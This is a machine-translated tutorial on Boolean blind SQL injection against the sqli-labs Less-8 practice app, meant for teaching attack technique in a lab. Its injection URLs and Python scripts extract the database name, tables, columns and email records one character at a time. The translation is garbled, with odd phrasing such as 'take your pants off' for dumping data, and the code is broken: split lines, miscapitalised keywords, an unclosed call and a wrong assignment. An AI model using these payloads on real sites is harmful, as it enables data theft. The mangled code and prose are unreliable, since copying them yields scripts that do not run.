SQL injection based on Boolean blind details _ database Other

A blind-bet based on Boolean

The Web page simply returns true and false. The Boolean blind is the SQL injection and then returns TRUE or false from the page to get the relevant information in the database.

Because this is a Boolean injection, the hand can not be completely pants. So in this section you need to write a lot of code to help us with SQL injection and get the data. So there's a lot of Python code in this chapter.

The example of this is Less-8.

By injecting the following statement into the test

http://localhost/sqlilabs/Less-8/?id=2 '
http://localhost/sqlilabs/Less-8/?id=2 '
http://localhost/ Sqlilabs/less-8/?id=2\

When testing, the id=2' page cannot display content only when it is in. If the input statement meets the requirements, the page displays the content, but the displayed content is the same. In this case, the output on the page is completely useless for us, including the information that the SQL execution error will not appear on the page. In this case, the information that was returned after executing the SQL statement and then displaying the SQL execution on the page is completely impossible. In this case, it's a typical SQL blind.

We use the page to determine whether the content of our SQL statement is correct, and then guess the database information.

Through the above injection test, we know that the background of the SQL injection statements are written:

Select field from table where id= ' Userinput '

The ID parameter is included in the quotation marks. We can't get the rest of the information.

Get the name of the database

Before you get the name of the database, you first need to get the length of the database

http://localhost/sqlilabs/Less-8/?id=2 ' and Length (database ()) >1%23
http://localhost/sqlilabs/Less-8/?id= 2 ' and Length (database ()) >2%23, etc. .....

When a value of 8 is found, the page is not displayed. So database() the length of the description is 8.

After you get the datbase() length, the next thing you get is the database() name.

It's not entirely up to hand at this point, you have to write Python code to do it. The main thing is to do a lot of injection testing to determine the timing of the program's execution and error, and then conclude that the current value may be the correct value.

Here's a simple code that uses Python to get data from a Boolean blind.

Def get_db_name (): Result
 = ""
 url_template = "http://localhost/sqlilabs/Less-8/?id=2" and ASCII (SUBSTR ( Database (), {0},1)) >{1}%23 "
 chars = ' 0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz '
 For I in Range (1,9): for
  char in chars:
   char_ascii = Ord (char)
   URL = Url_template.format (i,char_ascii)
   Response = requests.get (URL)
   length = Len (response.text)
   #返回的长度只有706和722
   if length>706:
    Result + = char break
 print (Result)

The final result is the security that is right.

Get the table information in the database

In fact, all SQL injection steps are similar. First get the name of the database (this step is not required), and then get the table name of the current database, then get the table fields, and finally pants. This step has been explained in the previous chapter.

First look at a simple SQL blind to get the database table information to be written.

Http://localhost/sqlilabs/Less-8/?id=2 ' and ASCII (SUBSTR (select table_name from Information_schema.tables where Table_schema=database () limit 0,1), 1,1) >60%23

In fact, the use of the previous select table_name from information_schema.tables where table_schema=database() limit 0,1 statements to get the table information, but now is not displayed on the page, but through the blind to a character by one character to get the table name.

The next thing to do is to get the table name by writing Python code. The code is similar to the above. The main thing is to modify the URL in. We also need to know the length of the table name before we do the Python fetch table name.

Use the following statement to get it.

The syntax for getting the SQL injection of the table name is as follows

http://localhost/sqlilabs/Less-8/?id=2 ' and (SELECT Length (table_name) from Information_schema.tables where Table_ Schema=database () limit 0,1) >0%23

In this way we know that the first table name in the database table has a length of 6. After you know the length of the table name, the next Python script is well written.

Def get_table_name (): Result
 = ""
 url_template = "http://localhost/sqlilabs/Less-8/?id=2" and ASCII (SUBSTR ( Select table_name from Information_schema.tables where table_schema=database () limit 0,1), {0},1)) >{1}%23 "
 chars = ' 0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz ' for
 I in range (1,7): for
  Char in Chars:
   char_ascii = Ord (char)
   URL = Url_template.format (i,char_ascii)
   response = requests.get (URL)
   length = Len (response.text)
   #返回的长度只有706和722
   if length>706: result
    + = char break
 Print ( Result

Finally got the first table name is emails, if you want to get the other table names only need to limit 0,1 modify the code limit 1,1 or the other is OK.

Get column information for table name

Before you get the column name, you also need to know the length of the field in the table. For example, if we want to know the length of a emails table, we can use the following statement to get it.

http://localhost/sqlilabs/Less-8/?id=2 ' and (select Length (column_name) from Information_schema.columns where Table_ name=0x656d61696c73 limit 0,1) > "num"%23

Change the value of NUM, starting at 0 until the program error occurs. In this way, we get 2 fields in emails, and the length of the fields is 2, 8.
After the field length is obtained, the next step is to get the field name by Boolean injection.

Before you write the code, let's see how to write the SQL statement that gets the name of the field. The following code is the code used to get the field name.

Http://localhost/sqlilabs/Less-8/?id=2 ' and ASCII (substr (select column_name from Information_schema.columns where table_name=0x656d61696c73 limit 0,1), 1,1) >60%23

The Python code we write also uses the code above to get the field name.

Def get_column_name (): Result
 = ""
 url_template = "http://localhost/sqlilabs/Less-8/?id=2" and ASCII (SUBSTR ( Select column_name from information_schema.columns where table_name=0x656d61696c73 limit 0,1), {0},1)) >{1}%23 "
 chars = ' 0123456789abcdefghijklmnopqrstuvwxyz_abcdefghijklmnopqrstuvwxyz ' for
 I in range (1,3): for
  Char in Chars:
   char_ascii = Ord (char)
   URL = Url_template.format (i,char_ascii)
   response = requests.get (URL)
   length = Len (response.text)
   #返回的长度只有706和722
   if length>706: result
    + = char break
 Print ( Result

With this code above, we can get the names of the fields that exist in the emails table, respectively, id andemail_id

Pants off

After you get the field name, the next most important step is to take your pants off.
Before we take the pants off, we first judge how many records are in the emails table.

The following statements are used:

http://localhost/sqlilabs/Less-8/?id=2 ' and (select COUNT (*) from emails) >0%23

After modifying the 0 in >0 to 1,2,3, we get a total of 8 records in the emails table.

So the next step is to take off the pants.

Before we take off our pants, we first need to know the length of the current record, and this SQL statement is very well written.

http://localhost/sqlilabs/Less-8/?id=2 ' and (select Length (email_id) from emails limit 0,1) >15%23

Finally we know that the length of the first record in the emails table email_id is 16.

Once you know the length, the code is well written.

Def get_data (): Result
 = ""
 url_template = "http://localhost/sqlilabs/Less-8/?id=2" and ASCII (substr (select email_id from emails limit 0,1), {0},1)) >{1}%23 "
 chars = '. 0123456789@abcdefghijklmnopqrstuvwxyz_ ABCDEFGHIJKLMNOPQRSTUVWXYZ ' for
 I in range (1,17): for
  char in chars:
   char_ascii = Ord (char)
   URL = url_ Template.format (i,char_ascii)
   response = requests.get (URL)
   length = Len (response.text)
   # The length returned is only 706 and 722
   if length>706: result
    = char break
 print (Result)

The above code will get the content is Dumb@dhakkan.com, the other content is also through this way to get the data. There is no demonstration here.

Summarize

In fact, both the Boolean blind and the time based blinds need to write a lot of code, just like in this article. In a simple SQL injection, a problem that can be solved by a SQL injection code here is the need to write Python code to do a lot of injection testing to get the content. In fact, I have rarely used Python to write SQL injection code complete the entire Boolean blind injection process. By writing this chapter, you are familiar with the process of using Python code to do a full Boolean blind and learn a lot. The above is the entire content of this article, hope to be helpful to everybody.